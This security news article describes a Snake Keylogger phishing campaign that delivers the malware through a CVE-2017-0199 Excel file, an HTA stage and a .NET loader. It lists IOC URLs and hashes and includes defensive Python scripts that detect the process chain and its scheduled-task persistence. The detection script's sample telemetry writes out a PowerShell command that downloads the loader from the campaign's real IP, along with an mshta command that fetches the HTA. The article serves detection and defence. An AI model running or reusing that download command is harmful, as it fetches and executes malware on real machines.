Snake Keylogger Targets Windows via Malicious Excel Files



Researchers have identified a sophisticated phishing campaign using a .NET-based Snake Keylogger variant. This attack uses weaponized Excel files to compromise Windows systems, posing serious risks to data security.

Snake Keylogger

Snake Keylogger, also known as “404 Keylogger” or “KrakenKeylogger,” is a .NET-based malware designed to steal sensitive data like credentials, clipboard content, and device info. It also logs keystrokes and captures screenshots, making it a powerful tool for cybercriminals.

Fortinet’s FortiGuard Labs reported that the attack starts with a phishing email that lures the recipient into opening an attached Excel file named “swift copy.xls.” The email falsely claims that funds have been transferred to the recipient’s account. Even though FortiGuard had already tagged the subject line with a “[virus detected]” warning, some users may still open the attachment.

The Malicious Excel Document

When the Excel file is opened, nothing visible happens in the spreadsheet, but the document carries an embedded OLE link that Excel follows without any user interaction. This is CVE-2017-0199, the Office OLE link-handling flaw patched in April 2017: Excel silently requests the linked URL, and the response is the next stage of the attack. No macro is involved, so macro blocking alone does not stop this stage.

The linked resource is an HTA file (107.hta in the IOCs below), which Windows runs with the Microsoft HTML Application Host (mshta.exe). The HTA contains obfuscated JavaScript that, once decoded, yields VBScript and a PowerShell command; these download and execute sahost.exe, the Snake Keylogger loader module and a key part of the attack.
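The process chain described above (Excel opening the document, mshta.exe fetching the HTA, PowerShell fetching the loader) is easy to spot in endpoint telemetry. The following Python is an added example, not code from this article or from FortiGuard Labs: it runs three detection rules over constructed, Sysmon-style process-creation records and matches command lines and image hashes against the IOCs listed at the end of this page. The field names (pid, ppid, image, parent_image, cmdline, sha256), the PowerShell download command and the file paths in the sample records are assumptions, not observed data.

```python
"""Hunt for the Excel > mshta.exe > PowerShell > loader chain.

Added example, not code from the article or from FortiGuard Labs. The
records below are constructed, Sysmon-style process-creation events; the
field names are an assumption about how a SIEM exposes such events.
"""
import re

# Indicators copied from the IOC section of the article (refanged).
IOC_HOSTS = {"urlty.co", "192.3.176.138"}
IOC_SHA256 = {
    "8406A1D7A33B3549DD44F551E5A68392F85B5EF9CF8F9F3DB68BD7E02D1EABA7",  # swift copy.xls
    "6F6A660CE89F6EA5BBE532921DDC4AA17BCD3F2524AA2461D4BE265C9E7328B9",  # 107.hta
    "484E5A871AD69D6B214A31A3B7F8CFCED71BA7A07E62205A90515F350CC0F723",  # loader (sahost.exe)
    "207DD751868995754F8C1223C08F28633B47629F78FAAF70A3B931459EE60714",  # core module
}
OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"mshta.exe", "powershell.exe", "pwsh.exe", "wscript.exe",
                "cscript.exe", "cmd.exe"}
URL_RE = re.compile(r"""https?://([^/\s:"']+)""", re.IGNORECASE)


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def office_spawned_script_host(ev):
    """Rule 1: an Office application launched a script or command interpreter."""
    return (basename(ev["parent_image"]) in OFFICE_APPS
            and basename(ev["image"]) in SCRIPT_HOSTS)


def mshta_spawned_script_host(ev):
    """Rule 2: mshta.exe launched a further interpreter (the HTA's VBScript/PowerShell stage)."""
    return (basename(ev["parent_image"]) == "mshta.exe"
            and basename(ev["image"]) in SCRIPT_HOSTS)


def ioc_hits(ev):
    """Rule 3: the command line reaches a known host, or the image hash is a known sample."""
    hits = {h.lower() for h in URL_RE.findall(ev["cmdline"]) if h.lower() in IOC_HOSTS}
    if ev.get("sha256", "").upper() in IOC_SHA256:
        hits.add(ev["sha256"].upper())
    return sorted(hits)


def chain_from(events, pid):
    """Follow ppid links upward and return the image names root-first."""
    by_pid = {e["pid"]: e for e in events}
    names, seen, cur = [], set(), by_pid.get(pid)
    while cur is not None and cur["pid"] not in seen:  # 'seen' guards against pid-reuse loops
        seen.add(cur["pid"])
        names.append(basename(cur["image"]))
        cur = by_pid.get(cur["ppid"])
    return list(reversed(names))


def analyze(events):
    """Return one finding per event that trips at least one rule, with its ancestry."""
    findings = []
    for ev in events:
        reasons = []
        if office_spawned_script_host(ev):
            reasons.append("office-app spawned script host")
        if mshta_spawned_script_host(ev):
            reasons.append("mshta.exe spawned script host")
        hits = ioc_hits(ev)
        if hits:
            reasons.append("IOC match: " + ", ".join(hits))
        if reasons:
            findings.append({"pid": ev["pid"], "image": basename(ev["image"]),
                             "reasons": reasons,
                             "chain": " > ".join(chain_from(events, ev["pid"]))})
    return findings


# Constructed sample telemetry (not real logs). Hashes of system binaries are
# zero placeholders; only the dropped loader carries a hash from the IOC list.
_NOHASH = "0" * 64
_EXCEL = r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE"
_MSHTA = r"C:\Windows\System32\mshta.exe"
_PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
_LOADER = r"C:\Users\alice\AppData\Local\Temp\sahost.exe"
SAMPLE_EVENTS = [
    {"pid": 4120, "ppid": 988, "image": _EXCEL, "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": r'"EXCEL.EXE" "C:\Users\alice\Downloads\swift copy.xls"', "sha256": _NOHASH},
    {"pid": 5312, "ppid": 4120, "image": _MSHTA, "parent_image": _EXCEL,
     "cmdline": _MSHTA + " http://192.3.176.138/xampp/zoom/107.hta", "sha256": _NOHASH},
    {"pid": 5400, "ppid": 5312, "image": _PS, "parent_image": _MSHTA,
     "cmdline": "powershell.exe -w hidden -c \"(New-Object Net.WebClient).DownloadFile("
                "'http://192.3.176.138/107/sahost.exe', $env:TEMP + '\\sahost.exe')\"",
     "sha256": _NOHASH},
    {"pid": 5488, "ppid": 5400, "image": _LOADER, "parent_image": _PS, "cmdline": _LOADER,
     "sha256": "484E5A871AD69D6B214A31A3B7F8CFCED71BA7A07E62205A90515F350CC0F723"},
    # An administrator opening PowerShell from Explorer: must not alert.
    {"pid": 6000, "ppid": 988, "image": _PS, "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": "powershell.exe", "sha256": _NOHASH},
]

if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f["pid"], f["chain"], "|", "; ".join(f["reasons"]))
```

Rule 1 is the one worth keeping even after the IOCs go stale: an Office process should almost never spawn mshta.exe, PowerShell or a script host, whatever URL or hash the sample carries. The IOC rule is only as good as the list, so treat it as a confirmation, not as the primary detection.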

The Loader Module

The Loader module, built on the .NET Framework, is wrapped in several layers of code transformation (obfuscation) and encryption to evade static detection. At run time it decrypts and extracts the embedded components needed to deploy the core Snake Keylogger module.

Deploy Module and Persistence

The Deploy module, extracted by the Loader, makes Snake Keylogger persistent: it renames the Loader file and hides it, creates a startup task so the Loader runs again after the machine restarts, and uses process hollowing to inject the malicious code into a newly created process. Because of the hollowing, the process that ends up running the keylogger was started from a different executable than the code it executes, so the file-hash IOCs below identify the dropped files rather than the hollowed host process.
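The persistence step above leaves a scheduled-task definition behind that can be audited offline. The following Python is an added example, not code from this article or from FortiGuard Labs. It assumes the “startup task” is a Task Scheduler task; it parses task XML (the format stored under C:\Windows\System32\Tasks and produced by `schtasks /query /xml`) and flags actions that run from user-writable directories, logon or boot triggers, and tasks hidden from the Task Scheduler UI. The two task bodies are constructed samples: the file name WeENKtk.exe comes from the IOC list below, while the AppData path, the task shape and the benign updater are assumptions.

```python
r"""Audit Task Scheduler XML for the persistence pattern described above.

Added example, not code from the article or from FortiGuard Labs. It assumes
the "startup task" is a scheduled task. On a live host, export a task with
`schtasks /query /xml /tn <name>` or read the UTF-16 XML files under
C:\Windows\System32\Tasks. The task bodies below are constructed samples.
"""
import re
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
# Directories a standard user can write to. A task whose action lives here
# deserves a look; installed software normally runs from Program Files.
USER_WRITABLE = re.compile(r"\\(AppData|Temp|Downloads|Users\\Public|ProgramData)\\", re.I)
START_TRIGGERS = ("LogonTrigger", "BootTrigger", "SessionStateChangeTrigger")
SCRIPT_HOSTS = {"mshta.exe", "powershell.exe", "pwsh.exe", "wscript.exe",
                "cscript.exe", "cmd.exe"}


def audit_task(xml_text, name="<unnamed>"):
    """Return findings for one task definition (str or bytes of task XML)."""
    root = ET.fromstring(xml_text)
    findings = []
    for exec_ in root.findall(".//t:Actions/t:Exec", NS):
        cmd = exec_.findtext("t:Command", default="", namespaces=NS).strip().strip('"')
        args = exec_.findtext("t:Arguments", default="", namespaces=NS)
        if USER_WRITABLE.search(cmd):
            findings.append(f"runs from user-writable path: {cmd}")
        if cmd.rsplit("\\", 1)[-1].lower() in SCRIPT_HOSTS and "http" in args.lower():
            findings.append(f"script host fetching remote content: {cmd} {args}")
    for trig in START_TRIGGERS:
        if root.find(f".//t:Triggers/t:{trig}", NS) is not None:
            findings.append(f"starts automatically ({trig})")
    hidden = root.findtext(".//t:Settings/t:Hidden", default="", namespaces=NS)
    if hidden.strip().lower() == "true":
        findings.append("hidden from the Task Scheduler UI")
    suspicious = any(f.startswith(("runs from user-writable", "script host")) for f in findings)
    return {"name": name, "suspicious": suspicious, "findings": findings}


def audit_task_file(path):
    """Audit a task file read as bytes, so the UTF-16 BOM in the on-disk files is honoured."""
    with open(path, "rb") as fh:
        return audit_task(fh.read(), name=path)


# Constructed sample: a hidden logon task running a renamed loader from AppData.
# The file name is from the article's IOC list; the path is an assumption.
SUSPICIOUS_TASK = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
  <Settings><Hidden>true</Hidden></Settings>
  <Actions Context="Author">
    <Exec><Command>"C:\Users\alice\AppData\Roaming\WeENKtk.exe"</Command></Exec>
  </Actions>
</Task>"""

# Constructed sample: a vendor updater on a daily schedule under Program Files.
BENIGN_TASK = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><CalendarTrigger><ScheduleByDay><DaysInterval>1</DaysInterval></ScheduleByDay></CalendarTrigger></Triggers>
  <Actions Context="Author">
    <Exec><Command>C:\Program Files\ExampleVendor\updater.exe</Command><Arguments>/check</Arguments></Exec>
  </Actions>
</Task>"""

if __name__ == "__main__":
    for result in (audit_task(SUSPICIOUS_TASK, "WeENKtk"), audit_task(BENIGN_TASK, "ExampleUpdater")):
        print(result["name"], "SUSPICIOUS" if result["suspicious"] else "ok", result["findings"])
```

A user-writable path is the strongest single signal here; a logon trigger or a hidden task on its own is common in legitimate software, which is why only the path and remote-fetch findings set `suspicious`. On the host itself, `attrib <path>` on the flagged command shows whether the Deploy module also set the hidden attribute on the renamed Loader.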

The Snake Keylogger attack underscores the need for strong defenses as cybercriminals keep refining their tactics.

Users and organizations should keep Office patched (the fix for CVE-2017-0199 has been available since April 2017, so a patched Office is not exploitable by this initial stage), run up-to-date antivirus software, treat unexpected email attachments with suspicion, and invest in awareness training to protect sensitive data.

The .NET-based Snake Keylogger campaign delivered through Excel documents is a serious threat to Windows users. Understanding the attack chain and applying these proactive measures helps individuals and organizations stay protected.

IOCs

URLs

hxxp://urlty[.]co/byPCO
hxxp://192.3.176[.]138/xampp/zoom/107.hta
hxxp://192.3.176[.]138/107/sahost.exe

Relevant Sample SHA-256

[swift copy.xls]
8406A1D7A33B3549DD44F551E5A68392F85B5EF9CF8F9F3DB68BD7E02D1EABA7

[107.hta]
6F6A660CE89F6EA5BBE532921DDC4AA17BCD3F2524AA2461D4BE265C9E7328B9

[The Loader module/sahost.exe / WeENKtk.exe / utGw.exe]
484E5A871AD69D6B214A31A3B7F8CFCED71BA7A07E62205A90515F350CC0F723

[Snake Keylogger core module / lfwhUWZlmFnGhDYPudAJ.exe]
207DD751868995754F8C1223C08F28633B47629F78FAAF70A3B931459EE60714


Published September 3rd, 2024 | Internet Security, malicious cyber actors, Malware, Security Advisory, Security Update

About the Author: FirstHackersNews (Identifies Security)
